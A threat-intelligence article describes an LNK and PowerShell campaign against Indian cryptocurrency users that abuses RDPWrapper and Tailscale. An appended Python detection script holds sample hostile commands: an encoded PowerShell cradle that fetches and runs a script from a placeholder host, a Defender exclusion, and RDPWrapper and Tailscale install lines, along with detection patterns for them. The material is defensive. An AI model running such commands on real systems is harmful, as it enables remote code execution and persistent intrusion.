A new sophisticated campaign has been discovered targeting individuals involved in the cryptocurrency market. This campaign utilizes a multi-stage approach, primarily leveraging RDPWrapper and Tailscale to facilitate unauthorized access and establish control over victim systems.
The attack begins with a malicious Zip file containing a shortcut (.lnk) file. Upon execution, this shortcut triggers a PowerShell script download from a remote server, initiating a sequence of actions designed to compromise the victim’s system. Notably, the PowerShell script is obfuscated to evade detection mechanisms.
The campaign involves several malicious components, including PowerShell scripts, batch files, Go-based binaries, and exploits targeting a vulnerable driver known as Terminator (Spyboy). Although Terminator was not immediately activated during initial infections, its potential use highlights the threat actor’s intent to escalate privileges post-infection.
According to Cyble Research and Intelligence Labs (CRIL), a unique aspect of this campaign is the exploitation of legitimate tools such as RDPWrapper and Tailscale. RDPWrapper enables multiple Remote Desktop Protocol (RDP) sessions per user, circumventing the default Windows restriction of one session per PC. This capability allows threat actors to maintain persistent access to compromised systems discreetly.
Tailscale, on the other hand, is employed by threat actors to establish a secure, private network connection. By configuring Tailscale, attackers add the victim’s machine as a node on their private network, facilitating remote command execution and data exfiltration without direct visibility from conventional network security measures.
The attackers have tailored their approach with geographic and industry-specific targeting in mind. Evidence suggests a focus on Indian users within the cryptocurrency ecosystem, as indicated by the deployment of a decoy PDF related to cryptocurrency futures trading on CoinDCX, a prominent Indian exchange platform.
Following initial infection, the malware drops and executes a Go-based loader that performs anti-virtualization and anti-debugging checks. It then downloads additional payloads, including GoDefender (adr.exe) and potentially malicious drivers like Terminator.sys. These payloads are designed to evade detection and enhance control over the compromised system.
Furthermore, the malware configures the system to allow multiple concurrent RDP sessions using RDPWrapper. It also modifies the Windows registry and installs software such as Tailscale to maintain persistent access and facilitate further malicious activity.
Once established, RDP access grants threat actors significant control over compromised devices. They can execute commands, deploy ransomware, exfiltrate sensitive data, or pivot to other systems within the network, potentially causing severe operational and financial damage.
Cyble’s investigation revealed similarities between this campaign and previous incidents involving the StealC malware strain. The reuse of the same decoy PDF and attack techniques suggests a common threat actor behind these operations, possibly targeting cryptocurrency users with varying attack vectors.
To mitigate the risks of sophisticated cyber campaigns targeting cryptocurrency users, Cyble recommends proactive measures. Monitoring should include detection of base64-encoded PowerShell scripts and unauthorized software installations like RDP wrappers.
Enhanced security configurations involve strengthening UAC settings, monitoring Defender exclusion paths, and implementing strong authentication for RDP sessions. Network segmentation is crucial to isolate critical systems and minimize the impact of potential compromises.
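The monitoring the two paragraphs above call for can be checked against process-creation telemetry. The script below is an added example, not code from Cyble or The Cyber Express: it decodes `-EncodedCommand` PowerShell invocations (UTF-16LE base64) and flags command lines or decoded scripts that mention RDPWrapper, Tailscale, download cradles, or Defender exclusion changes. The sample command lines are constructed, and the indicator strings (rdpwrap, RDPWInst, tailscale, Add-MpPreference) are assumptions about what such activity looks like, not values from the report.

```python
import base64
import re

# Encoded PowerShell: any accepted prefix of -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(
    r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b.*?\s[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)

# Strings worth an alert in a command line or decoded script (assumed indicators,
# chosen to match the components the report describes).
INDICATORS = {
    "rdp_wrapper": re.compile(r"(?i)rdpwrap|rdpwinst"),
    "tailscale": re.compile(r"(?i)tailscale"),
    "defender_exclusion": re.compile(r"(?i)Add-MpPreference\s+-ExclusionPath"),
    "download_cradle": re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"),
}

def decode_encoded_command(blob: str):
    """Decode a -EncodedCommand argument; None if it is not valid base64 / UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

def inspect_cmdline(cmdline: str) -> dict:
    """Return findings for one process-creation command line (Sysmon ID 1 / Security 4688)."""
    findings = {"encoded_powershell": False, "decoded": None, "hits": []}
    text = cmdline
    m = ENC_RE.search(cmdline)
    if m:
        findings["encoded_powershell"] = True
        findings["decoded"] = decode_encoded_command(m.group(1))
        if findings["decoded"]:          # scan the decoded script too
            text += "\n" + findings["decoded"]
    findings["hits"] = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return findings

def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines (not taken from the report).
SAMPLES = [
    "powershell.exe -nop -w hidden -enc " + encode_ps(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1'); "
        "Add-MpPreference -ExclusionPath C:\\ProgramData\\x"),
    r'cmd.exe /c "C:\ProgramData\RDPWInst.exe -i -o"',
    r"C:\ProgramData\tailscale.exe up --authkey tskey-PLACEHOLDER",
    "powershell.exe -Command Get-Date",
]
```

Running `inspect_cmdline` over each entry of `SAMPLES` yields the encoded-cradle-plus-exclusion line, the RDPWrapper install, the Tailscale enrolment, and a clean baseline line respectively.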
Threat actors exploit tools such as RDPWrapper and Tailscale to evade detection and maintain persistent access, posing significant operational and financial risks. Maintaining vigilance, implementing proactive security measures, and staying updated with threat intelligence are essential to effectively defend against these advanced cyber threats in today’s digital environment.